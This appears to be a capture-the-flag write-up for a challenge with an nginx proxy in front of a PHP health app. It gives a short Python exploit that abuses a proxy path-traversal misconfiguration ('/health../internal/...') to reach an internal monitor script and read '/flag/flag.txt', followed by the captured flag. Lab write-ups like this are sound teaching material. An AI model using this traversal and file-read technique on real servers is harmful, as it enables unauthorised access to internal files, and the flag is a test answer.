Config

Structure

config
├── health-app/ 
│   ├── external/ 
│       └── index.php 
│   ├── flag/ 
│       └── flag.txt
│   ├── internal/ 
│       ├── index.php 
│       └── monitor.php
│   └── Dockerfile 
└── nginx-proxy/ 
    ├── Dockerfile
    └── nginx.conf

Solution

Install pip

sudo apt install python3-pip

Install requests

python3 -m pip install requests

Exploit

from requests import post

host = '127.0.0.1'
port = '8001'

payload = {
    'logfile': '/flag/flag.txt'
}
flag = post(f'http://{host}:{port}/health../internal/monitor.php', data = payload).text
print(flag)

Run the script

python3 exploit.py

Output

TCC{n91NX_rpR0xY_M15C0nF19Ur4t10n}<br>

Last updated